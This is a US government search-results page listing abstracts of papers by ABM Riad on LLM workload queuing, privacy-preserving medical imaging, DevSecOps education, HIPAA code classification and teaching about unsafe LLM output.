skip to main content
US FlagAn official website of the United States government
dot gov icon
Official websites use .gov
A .gov website belongs to an official government organization in the United States.
https lock icon
Secure .gov websites use HTTPS
A lock ( lock ) or https:// means you've safely connected to the .gov website. Share sensitive information only on official, secure websites.


Search for: All records

Creators/Authors contains: "Riad, ABM"

Note: When clicking on a Digital Object Identifier (DOI) number, you will be taken to an external site maintained by the publisher. Some full text articles may not yet be available without a charge during the embargo (administrative interval).
What is a DOI Number?

Some links on this page may take you to non-federal websites. Their policies may differ from this site.

  1. Large Language Models (LLMs) have demonstrated exceptional capabilities in the field of Artificial Intelligence (AI) and are now widely used in various applications globally. However, one of their major challenges is handling high-concurrency workloads, especially under extreme conditions. When too many requests are sent simultaneously, LLMs often become unresponsive which leads to performance degradation and reduced reliability in real-world applications. To address this issue, this paper proposes a queue-based system that separates request handling from direct execution. By implementing a distributed queue, requests are processed in a structured and controlled manner, preventing system overload and ensuring stable performance. This approach also allows for dynamic scalability, meaning additional resources can be allocated as needed to maintain efficiency. Our experimental results show that this method significantly improves resilience under heavy workloads which prevents resource exhaustion and enables linear scalability. The findings highlight the effectiveness of a queue-based web service in ensuring LLMs remain responsive even under extreme workloads. 
    more » « less
    Free, publicly-accessible full text available July 8, 2026
  2. The increasing use of high-dimensional imaging in medical AI raises significant privacy and security concerns. This paper presents a Bootstrap Your Own Latent (BYOL)-based self supervised learning (SSL) framework for secure image processing, ensuring compliance with HIPAA and privacy-preserving machine learning (PPML) techniques. Our method integrates federated learning, homomorphic encryption, and differential privacy to enhance security while reducing dependence on labeled data. Experimental results on the MNIST and NIH Chest Xray datasets demonstrate a classification accuracy of 97.5% and 99.99% (pre-fine-tuning 40%), with improved clustering performance using K-Means (Silhouette Score: 0.5247). These findings validate BYOL’s capability for robust, privacy-preserving image processing while emphasizing the need for fine-tuning to optimize classification performance. 
    more » « less
    Free, publicly-accessible full text available July 8, 2026
  3. In today’s fast-paced software development environments, DevOps has revolutionized the way teams build, test, and deploy applications by emphasizing automation, collaboration, and continuous integration/continuous delivery (CI/CD). However, with these advancements comes an increased need to address security proactively, giving rise to the DevSecOps movement, which integrates security practices into every phase of the software development lifecycle. DevOps security remains underrepresented in academic curricula despite its growing importance in the industry. To address this gap, this paper presents a handson learning module that combines Chaos Engineering and Whitebox Fuzzing to teach core principles of secure DevOps practices in an authentic, scenario-driven environment. Chaos Engineering allows students to intentionally disrupt systems to observe and understand their resilience, while White-box Fuzzing enables systematic exploration of internal code paths to discover cornercase vulnerabilities that typical tests might miss. The module was deployed across three academic institutions, and both pre- and post-surveys were conducted to evaluate its impact. Pre-survey data revealed that while most students had prior experience in software engineering and cybersecurity, the majority lacked exposure to DevOps security concepts. Post-survey responses gathered through ten structured questions showed highly positive feedback 66.7% of students strongly agreed, and 22.2% agreed that the hands-on labs improved their understanding of secure DevOps practices. Participants also reported increased confidence in secure coding, vulnerability detection, and resilient infrastructure design. These findings support the integration of experiential learning techniques like chaos simulations and white-box fuzzing into security education. By aligning academic training with realworld industry needs, this module effectively prepares students for the complex challenges of modern software development and operations. 
    more » « less
    Free, publicly-accessible full text available July 8, 2026
  4. Although software developers of mHealth apps are responsible for protecting patient data and adhering to strict privacy and security requirements, many of them lack awareness of HIPAA regulations and struggle to distinguish between HIPAA rules categories. Therefore, providing guidance of HIPAA rules patterns classification is essential for developing secured applications for Google Play Store. In this work, we identified the limitations of traditional Word2Vec embeddings in processing code patterns. To address this, we adopt multilingual BERT (Bidirectional Encoder Representations from Transformers) which offers contextualized embeddings to the attributes of dataset to overcome the issues. Therefore, we applied this BERT to our dataset for embedding code patterns and then uses these embedded code to various machine learning approaches. Our results demonstrate that the models significantly enhances classification performance, with Logistic Regression achieving a remarkable accuracy of 99.95%. Additionally, we obtained high accuracy from Support Vector Machine (99.79%), Random Forest (99.73%), and Naive Bayes (95.93%), outperforming existing approaches. This work underscores the effectiveness and showcases its potential for secure application development. 
    more » « less
    Free, publicly-accessible full text available July 8, 2026
  5. Large Language Models (LLMs) have extensive ability to produce promising output. Nowadays, people are increasingly relying on them due to easy accessibility, rapid and outstanding outcomes. However, the use of these results without appropriate scrutiny poses serious security risks, particularly when they are integrated with other software, APIs, or plugins. This is because the LLM outputs are highly dependent on the prompts they receive. Therefore, it is essential to carefully clean these outputs before using them in additional software environments. This paper is designed to teach students about the potential dangers of contaminated LLM output within the context of web development through prelab, handson, and postlab experiences. Hands-on lab provides practical guidance on how to handle LLM vulnerabilities to make applications safe with some real-world examples in Python. This approach aims to provide students with a deeper understanding of the precautions necessary to ensure software against the vulnerabilities introduced by LLM output. 
    more » « less
  6. Large Language Models (LLMs) have extensive ability to produce promising output. Nowadays, people are increasingly relying on them due to easy accessibility, rapid and outstanding outcomes. However, the use of these results without appropriate scrutiny poses serious security risks, particularly when they are integrated with other software, APIs, or plugins. This is because the LLM outputs are highly dependent on the prompts they receive. Therefore, it is essential to carefully clean these outputs before using them in additional software environments. This paper is designed to teach students about the potential dangers of contaminated LLM output within the context of web development through prelab, handson, and postlab experiences. Hands-on lab provides practical guidance on how to handle LLM vulnerabilities to make applications safe with some real-world examples in Python. This approach aims to provide students with a deeper understanding of the precautions necessary to ensure software against the vulnerabilities introduced by LLM output. 
    more » « less